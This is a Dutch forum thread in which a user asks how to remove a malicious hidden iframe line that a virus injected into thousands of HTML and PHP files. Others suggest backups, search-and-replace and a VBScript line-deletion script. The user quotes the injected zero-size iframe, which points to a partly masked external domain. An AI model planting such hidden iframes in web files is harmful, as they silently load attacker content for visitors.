Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

Automatisch regel verwijderen uit bestanden

Pagina: 1
Acties:

• Dimby
  • Registratie: April 2008
  • Laatst online: 01-07-2024
Hallo,

Ik had een virus op mijn computer dat aan een hele hoop bestanden een html iframe regel heeft toegevoegd.
Als ik deze regel verwijderd is het bestand weer schoon.
Nu is het virus al van mijn computer af maar de besmette bestanden zijn nog steeds besmet.
Mijn virusscanner (AVG Free) heeft 8000 bestanden gevonden die deze iframe bevatten maar hij kan ze niet schoon maken. De enige optie die ik krijg is het bestand verwijderen wat eigenlijk geen optie is aangezien het belangrijke bestanden zijn. Nu kan ik alle bestanden openen en alle regels verwijderen maar dit is veel werk aangezien ze ook nog een keer verspreid staan over de hele schijf.

Mijn vraag nu: Is er niet een programma dat in alle bestanden naar deze regel zoekt en deze vervangt/verwijderd?

Bedankt,
Paul

Verwijderd

Als het belangrijke bestanden zijn dan heb je er ongetwijfeld een backup van. Zet die terug. Dat is een stuk minder werk.

Verwijderd

Ik begrijp je probleem, maar ik begrijp niet dat je "belangrijke" bestanden heb in Windows 7.
Windows 7 is nog steeds beta en het is niet verstandig je belangrijke gegevens te bewaren/gebruiken/maken in een OS die nog in zijn test fase zit. Bekenste voorbeeld het vergallen van mp3-tjes
.
Maar goed dit valt natuurlijk onder de noemer voor een dubbeltje op de eerste rang.

Hoe groot is het grootste bestand die verwend is met die regel?
In welk formaat staat die regel?
Wat voor code zit er in je iframe?

Als het echt maar een simpel tekstje is die je met notepad kan verwijderen, dan is het op te lossen door zelf even een batch bestand aan te maken.

Of je back-up terug zetten, maar ik neem aan dat je die niet gemaakt heb.

• BtM909
  • Registratie: Juni 2000
  • Niet online

BtM909

Watch out Guys...

Verwijderd schreef op vrijdag 10 april 2009 @ 13:17:
Ik begrijp je probleem, maar ik begrijp niet dat je "belangrijke" bestanden heb in Windows 7.
Windows 7 is nog steeds beta en het is niet verstandig je belangrijke gegevens te bewaren/gebruiken/maken in een OS die nog in zijn test fase zit. Bekenste voorbeeld het vergallen van mp3-tjes
.
Maar goed dit valt natuurlijk onder de noemer voor een dubbeltje op de eerste rang.
:?

Anyhoe: in wat voor soort bestanden wordt die iframe regel toegevoegd?

Ace of Base vs Charli XCX - All That She Boom Claps (RMT) | Clean Bandit vs Galantis - I'd Rather Be You (RMT)
You've moved up on my notch-list. You have 1 notch
I have a black belt in Kung Flu.

• Dimby
De regel wordt toegevoegd aan alle .php en .htm(l) bestanden van de EXTERNe harde schijf. Op windows 7 zelf staan natuurlijk geen belangrijke bestanden. Ik zie net dat de backups (andere externe harde schrijf) ook de besmette bestanden bevat. Oftewel tijdens het backuppen gisteren zijn ze meegegaan.

Regel die toegevoegd wordt:
<iframe src=http://www.****.net/xm/xmxz.html width=0 height=0></iframe>

• Dimby
Ik heb nu SFK gedownload, die zou de (enige) oplossing zijn maar als ik hem opstart sluit hij meteen weer :(

• djexplo
  • Registratie: Oktober 2000
  • Laatst online: 27-10 15:31
Lijkt mij een kwestie van windows search uit voeren voor .html bestanden en dan bestanden selecteren in notepad++ slepen, en simpele text replace doen...

'if it looks like a duck, walks like a duck and quacks like a duck it's probably a duck'

• BtM909
  • Registratie: Juni 2000
  • Niet online

BtM909

Watch out Guys...

Als je als laatste hebt gereageerd en je wilt weer een reply posten (binnen 24 uur) edit dan je laatste bericht ;)

Overigens krijg ik aardig wat resultaten als ik ga [google=remove one line from a lot of html files]. Misschien dat een van deze oplossingen je verder helpt :)

Ace of Base vs Charli XCX - All That She Boom Claps (RMT) | Clean Bandit vs Galantis - I'd Rather Be You (RMT)
You've moved up on my notch-list. You have 1 notch
I have a black belt in Kung Flu.

• alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Dimby schreef op vrijdag 10 april 2009 @ 12:59:

Mijn vraag nu: Is er niet een programma dat in alle bestanden naar deze regel zoekt en deze vervangt/verwijderd?
Elke behoorlijke texteditor heeft een Search/Replace functionaliteit.

Wat dit dan ook met Windows te maken heeft ontgaat mij compleet eerlijk gezegd...

En anders script je er wat omheen?

Visual Basic:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
' Delete Lines of a Text File Beginning with a Specified String

Const FOR_READING = 1
Const FOR_WRITING = 2
strFileName = "C:\scripts\test.txt"
strCheckForString = UCase("july")

Set objFS = CreateObject("Scripting.FileSystemObject")
Set objTS = objFS.OpenTextFile(strFileName, FOR_READING)
strContents = objTS.ReadAll
objTS.Close

arrLines = Split(strContents, vbNewLine)
Set objTS = objFS.OpenTextFile(strFileName, FOR_WRITING)

For Each strLine In arrLines
   If Not(Left(UCase(LTrim(strLine)),Len(strCheckForString)) = strCheckForString) Then  
      objTS.WriteLine strLine
   End If
Next

Don't be helpless... have a clue cookie.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

• Dimby
Ik heb HFT gedownload en dat werkte, na een leuke zoekopdracht was alles weg :)
Pagina: 1